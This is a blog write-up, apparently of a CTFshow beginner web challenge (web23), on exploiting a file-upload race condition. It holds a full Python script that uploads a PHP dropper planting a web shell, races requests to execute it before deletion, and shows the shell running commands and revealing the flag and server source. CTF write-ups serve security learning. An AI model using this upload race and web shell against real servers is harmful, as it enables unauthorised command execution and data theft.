CTFSHOW 萌新 web23

根据题目猜测是条件竞争

原理: 在upload页面返回前原文件就被删除了, 所以需要在系统删除前通过猜测文件地址访问

import requests
import time
import threading
import datetime
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
base_url = "https://e0d64dad-1e22-4bf2-a93c-428a8206ae6a.challenge.ctf.show/"

stop_now = False


def execphp(fname):
    global stop_now
    try:
        r = requests.get(
            base_url + "uploads/" + fname + ".php", timeout=2, verify=False
        )
    except:
        return
    if r.status_code != 404:
        stop_now = True
        print(r.text)


def check():
    while not stop_now:
        threading.Thread(
            target=execphp,
            args=(datetime.datetime.now().strftime("%Y%m%d%H%M%S%f")[:-3],),
        ).start()
        time.sleep(0.001)


file_data = {
    "file": (
        "anything.php",
        f"""
<?php 
  echo "HEY!HEY!HEY! shell.php?1=ls";
  file_put_contents('../shell.php', '<?php system($_REQUEST[1]);?>');
?>
""".encode(),
    )
}


def upload():
    while not stop_now:
        try:
            print(
                requests.post(
                    base_url + "upload.php", files=file_data, timeout=2, verify=False
                ).text
            )
        except:
            pass


threading.Thread(target=check).start()
threading.Thread(target=upload).start()

执行命令

GET shell.php?1=ls
flaghere0.txt index.php shell.php upload.php uploads

GET shell.php?1=cat flaghere0.txt
ctfshow{e288bffc-fba5-4c1e-90de-4990a979aa3d}

GET shell.php?1=nl upload.php
 1	<?php 
 2		header("content-type:text/html;charset=utf-8");
 3		date_default_timezone_set('PRC');
 4		$filename = $_FILES['file']['name'];
 5		$temp_name = $_FILES['file']['tmp_name'];
 6		$size = $_FILES['file']['size'];
 7		$error = $_FILES['file']['error'];
 8		if ($size > 1*1024*1024){
 9			//
10			echo "<script>alert('文件大小超过1M大小');window.history.go(-1);</script>";
11			exit();
12		}
13		$arr = pathinfo($filename);
14		$ext_suffix = $arr['extension'];
15		if (!file_exists('uploads')){
16			mkdir('uploads');
17		}
18		$new_filename = date('YmdHis',time()).rand(100,1000).'.'.$ext_suffix;
19		if (move_uploaded_file($temp_name, 'uploads/'.$new_filename)){
20			echo "uploads/$new_filename";
21			sleep(1);
22			system("rm -rf ./uploads/*.php");
23			
24		}else{
25			echo "<script>alert('文件上传失败,错误码:$error');</script>";
26		}
27	
28	 ?>

rand(100,1000)这里是随机获取的并不是毫秒

posted @ 2026-06-16 16:11  twfb  阅读(4)  评论(0)    收藏  举报